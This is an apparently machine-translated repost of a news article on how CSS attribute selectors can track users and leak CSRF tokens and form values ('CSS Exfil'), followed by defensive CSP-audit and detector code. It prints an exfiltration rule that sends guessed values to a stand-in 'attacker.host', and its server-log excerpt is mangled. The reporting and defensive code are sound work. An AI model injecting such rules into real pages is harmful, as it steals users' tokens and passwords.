How does CSS work?

2025-01-14 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article mainly introduces "what is the working principle of CSS". Many people have questions about how CSS works in day-to-day use, so the editor consulted various materials and sorted out simple, easy-to-use methods. I hope it helps answer your questions about "what is the working principle of CSS?" Next, please follow the editor to study!

CSS is not only powerful in the presentation of web pages, but also plays a role in tracking users. It can track website users, extract and steal data from web pages, collect data entered in form fields (including passwords), and even expose the identity of dark web users.

In the past month, three interesting research projects have used CSS as an attack vector, showing that this seemingly harmless language can also be used against users.

Use CSS to track users on the page

The first project on this topic is Jan Böhmer's "Crooked Style Sheets", which provides a JavaScript-free tracking scheme that follows users' interactions with a page using only CSS code.

Böhmer says he can track when users hover, click links, or enter text in input fields, and can collect large amounts of real user agent information, even if they use a fake UA.

Using CSS to steal CSRF tokens

Unlike the work of Böhmer, security researcher Dylan Ayrey (XSSJacking author) also released new research over the weekend showing how attackers can misuse CSS to steal CSRF (user authentication) tokens.

Ayrey's attack only applies to Web sites and applications that store CSRF tokens in the attributes of various HTML page elements, so its scope is very limited. This attack can be easily defeated by site / application owners who find a more secure way to authenticate users without dumping CSRF tokens in the source code of the page.

Ayrey's technique relies on injecting CSS code into a web page and using CSS attribute selectors to guess the CSRF token one letter at a time.

The attack takes about 10 seconds to complete and can work even without iframes. It also does not require continuous traffic to a remote server, which might otherwise alert the user that something is wrong.

The threat of the CSS attribute selector does not stop there

Ayrey's research only scratches the surface. Over the past month, security researcher Mike Gualtieri has been experimenting with the same technique, but not just to steal tokens.

Gualtieri studies how to use the CSS attribute selector to guess the sensitive content left in the HTML tag.

Researchers can use this method to collect sensitive user data, including password strings, entered in the form field.

Working principle

Both Ayrey's and Gualtieri's methods take advantage of CSS attribute selectors, which allow developers to query the page's HTML tags for individual attributes and match their values.

For example, the following CSS code searches for link elements ("a") in the page where the "href" attribute contains the "facebook" string, and adds blue to all of these links.

a[href*="facebook"] { color: blue; }

These queries may seem harmless, but in the eyes of researchers, they may be used to carry out attacks.

These queries can be spliced together to perform a basic dictionary brute-force attack: guess the first letter of the attribute value, then add the recognized letter to a new pattern-matching rule so that the second letter can be guessed, then the third, and so on.

Selector             Example        Description
[attribute=value]    [foo=bar]      Selects all elements with foo="bar"
[attribute~=value]   [foo~=bar]     Selects all elements whose foo attribute contains the word "bar"
[attribute|=value]   [foo|=bar]     Selects all elements whose foo attribute value is "bar" or starts with "bar-"
[attribute^=value]   [foo^="bar"]   Selects all elements whose foo attribute value starts with "bar"
[attribute$=value]   [foo$="bar"]   Selects all elements whose foo attribute value ends with "bar"
[attribute*=value]   [foo*="bar"]   Selects all elements whose foo attribute value contains the substring "bar"

The attacker pairs the CSS selector with a declaration that triggers an HTTP request to the attacker's server when the selector matches.

#username[value="ZeroC00L"] { background: url("https://attacker.host/ZeroC00L"); }

The attacker then only needs to filter the server's 404 log entries to find the desired results.

127.0.0.1-[30/Jan/2018:11:09:35-0500] "GET / 00 HTTP/1.1" 404 22127.0.0.1-- [30/Jan/2018:11:09:35-0500] "GET / 0L HTTP/1.1" 404 22127.0.0.1-- [30/Jan/2018:11:09:36-0500] "GET / Ze HTTP/1.1" 404 22127.0.0. 1-- [30/Jan/2018:11:09:36-0500] "GET / ZHTTP/1.1" 404 22127.0.0.1-- [30/Jan/2018:11:09:36-0500] "GET / ro HTTP/1.1" 404 22127.0.0.1-- [30/Jan/2018:11:09:36-0500] "GET / oC HTTP/1.1" 404 22127.0.0.1-- [30/Jan/2018:11:09:36-0500] "GET / _ L HTTP/1.1" 404 22127.0.0.1-- [30/Jan/2018:11:09:36-0500] "GET / er HTTP/1.1" 404 22127.0.0.1-[30/Jan/2018:11:09:36-0500] "GET / C0 HTTP/1.1" 404 22

The fragments are then combined into the complete string.

Z         # Z_
Ze        # Ze
Zer       # er
Zero      # ro
ZeroC     # oC
ZeroC0    # C0
ZeroC00   # 00
ZeroC00L  # 0L _L

Ayrey and Gualtieri attack in two different ways. Ayrey's method guesses the last letter one step at a time, while Gualtieri's reconstructs the string from multiple guesses that are combined at the end.

Both methods are effective. Ayrey's method is noisy but can be easily automated, while Gualtieri's method is faster (and can also be automated), but in some cases relies on a person to concatenate the strings.

Gualtieri named this technique CSS Exfil. However, CSS Exfil can only steal HTML attributes that are on the page at load time, not values from code injected dynamically after the initial page load. Gualtieri doesn't think this is a big problem, and his research mentions that attackers have a variety of workarounds.

Defense

Defending against CSS Exfil attacks works at two levels. First, website and web application authors can enforce a Content Security Policy (CSP) to prevent attackers from loading CSS code from external sources.
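As an added example (not from the original article or from Gualtieri's research), the following audit checks a Content-Security-Policy value for the site-side defense described above. It goes slightly beyond the text by also checking img-src, which governs the background-image request, and the function names and sample policies are constructed for illustration.

```javascript
// Added example: audit a Content-Security-Policy value for the two fetch
// directives that matter here. style-src governs stylesheets; img-src governs
// the background-image url() request used as the callback channel.

function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/);
    // A repeated directive is ignored by browsers; the first one wins.
    if (name && !directives.has(name.toLowerCase())) {
      directives.set(name.toLowerCase(), sources);
    }
  }
  return directives;
}

const BROAD = new Set(["*", "http:", "https:"]); // any remote host allowed
const NONCE_OR_HASH = /^'(nonce|sha256|sha384|sha512)-/i;

function auditCsp(header) {
  const csp = parseCsp(header);
  const issues = [];
  for (const directive of ["style-src", "img-src"]) {
    // Both directives fall back to default-src when not set.
    const sources = csp.get(directive) || csp.get("default-src");
    if (!sources) {
      issues.push(`${directive}: unrestricted`);
      continue;
    }
    for (const s of sources) {
      if (BROAD.has(s.toLowerCase())) issues.push(`${directive}: broad source ${s}`);
    }
    // 'unsafe-inline' lets an injected <style> block apply, unless a nonce or
    // hash source is also present (browsers then ignore 'unsafe-inline').
    const inline = sources.some((s) => s.toLowerCase() === "'unsafe-inline'");
    if (directive === "style-src" && inline && !sources.some((s) => NONCE_OR_HASH.test(s))) {
      issues.push("style-src: 'unsafe-inline' allows injected styles");
    }
  }
  return issues;
}

// Constructed sample policies, weak beside corrected.
const WEAK_POLICY = "default-src https:; style-src * 'unsafe-inline'";
const STRICT_POLICY = "default-src 'none'; style-src 'self'; img-src 'self'; script-src 'self'";

console.log(auditCsp(WEAK_POLICY));
console.log(auditCsp(STRICT_POLICY));
```

An empty result means neither directive lets stylesheets or CSS-triggered image requests reach an arbitrary remote host.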

Second, visitors can also install Gualtieri's Firefox or Chrome extensions, which can detect all types of CSS Exfil attacks recorded by Gualtieri in his research and rewrite malicious code before execution.
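The kind of check such a detector performs can be sketched as follows. This is an added example, not the code of Gualtieri's extension or of the original article: it flags stylesheet rules that pair an attribute-value selector with a remote url() load, using a regex-based approximation rather than a full CSS parser. The function name, the sample stylesheet and the collector.example host are constructed for illustration.

```javascript
// Added example: flag CSS rules that pair an attribute-value selector with a
// remote url() load. Regex-based and approximate; not a full CSS parser.

// [attr=value] and the ~= |= ^= $= *= variants, quoted or unquoted values.
const ATTR_VALUE = /\[\s*([\w-]+)\s*([~|^$*]?=)\s*("[^"]*"|'[^']*'|[^\]\s]+)\s*(?:[is]\s*)?\]/g;
// url(...) with an absolute or protocol-relative address (leaves the origin).
const REMOTE_URL = /url\(\s*["']?\s*((?:https?:)?\/\/[^"')\s]+)/gi;
// Innermost "selector { declarations }" blocks, so rules inside @media match too.
const RULE = /([^{}]+)\{([^{}]*)\}/g;

function findExfilRules(css) {
  const withoutComments = css.replace(/\/\*[\s\S]*?\*\//g, "");
  const findings = [];
  for (const [, selectorText, body] of withoutComments.matchAll(RULE)) {
    const attrs = [...selectorText.matchAll(ATTR_VALUE)];
    const urls = [...body.matchAll(REMOTE_URL)].map((m) => m[1]);
    // Styling-only attribute selectors and same-origin url() loads are not flagged.
    if (attrs.length === 0 || urls.length === 0) continue;
    findings.push({
      selector: selectorText.trim(),
      attributes: attrs.map((m) => ({ name: m[1], operator: m[2] })),
      urls,
    });
  }
  return findings;
}

// Constructed sample stylesheet; collector.example is a placeholder host.
const SAMPLE_CSS = `
a[href*="facebook"] { color: blue; }
#username[value="ZeroC00L"] { background: url("https://attacker.host/ZeroC00L"); }
.logo { background: url("/static/logo.png"); }
@media screen {
  input[name=token][value^='a'] { background-image: url(//collector.example/a); }
}
`;

for (const f of findExfilRules(SAMPLE_CSS)) {
  console.log(`${f.selector} -> ${f.urls.join(", ")}`);
}
```

The harmless facebook rule and the same-origin logo rule are not reported; only the two rules that combine a value match with an off-site request are.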

You can visit the web page here for testing.

At this point, the study of "how CSS works" is over. I hope it has answered your questions. Combining theory with practice will help you learn better, so go and try it! If you want to learn more, please continue to follow the website; the editor will keep working to bring you more practical articles!
